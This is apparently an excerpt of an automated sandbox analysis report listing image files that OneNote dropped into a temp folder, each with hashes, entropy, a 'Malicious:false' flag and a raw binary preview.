                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                  C:\Users\user\AppData\Local\Temp\{3023B9BE-1472-418E-9215-4CD9337F8B07}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):567
                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{31C09740-6075-4AA5-9412-CA12D35EEA22}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2898
                                                                                                  Entropy (8bit):7.551512280854713
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                  MD5:7C7D9922101488124D2E4666709198AC
                                                                                                  SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                  SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                  SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

                                                                                                  C:\Users\user\AppData\Local\Temp\{33745A09-A695-47EF-9C0C-C1A7A73EFDAA}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{358D62BB-9AA6-4311-8AA7-850D1AAFB656}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Temp\{36537677-7623-4D1C-AFD0-AD7AF03E6E2F}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Temp\{38926DBE-E8F4-41ED-B7A6-9FEF56BCF237}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{3902E930-312F-42E6-9AAD-771D5B1AEA7C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Temp\{3A37FFA3-3294-477B-8B26-B7409571382B}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Temp\{3A813D6E-33DD-4FCC-BD1F-E75E16729C56}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Temp\{3AA429E5-8BE9-4D42-80FE-7DD2FF9FA803}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Temp\{3B5B5510-1615-45D1-9231-AEE0D054C60D}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55804
                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                  C:\Users\user\AppData\Local\Temp\{3C0B09F6-C9D3-4319-ACBB-E43D167E3C11}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Temp\{3CE327E1-DF71-43E1-B395-4397752EE966}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
